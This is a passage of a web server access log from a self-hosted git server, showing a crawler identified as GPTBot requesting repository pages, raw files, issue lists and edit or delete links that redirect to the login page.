"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:16:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:16:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 11066] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:16:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fMakefile.cmake" [Client 74.7.227.38] [Length 29054] [Gzip 6.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fprogress.marks" [Client 74.7.227.38] [Length 24630] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fMakefile2" [Client 74.7.227.38] [Length 26952] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7656] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" +[17/Feb/2026:16:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile?display=source" [Client 74.7.227.38] [Length 11802] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56432] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" +[17/Feb/2026:16:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56429] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" +[17/Feb/2026:16:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481684] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" +[17/Feb/2026:16:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56430] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" +[17/Feb/2026:16:57:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:57:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9812] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 882] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:16:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481685] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" +[17/Feb/2026:16:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14079] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481687] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" +[17/Feb/2026:16:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481686] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" +[17/Feb/2026:16:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 24162] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" +[17/Feb/2026:16:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 11340] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:16:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:16:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:16:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11523] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" +[17/Feb/2026:16:57:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:57:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json?display=source" [Client 74.7.227.38] [Length 11355] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 10393] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:16:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:16:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:16:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:16:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:16:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:16:58:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:58:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/global.json" +[17/Feb/2026:16:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:16:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 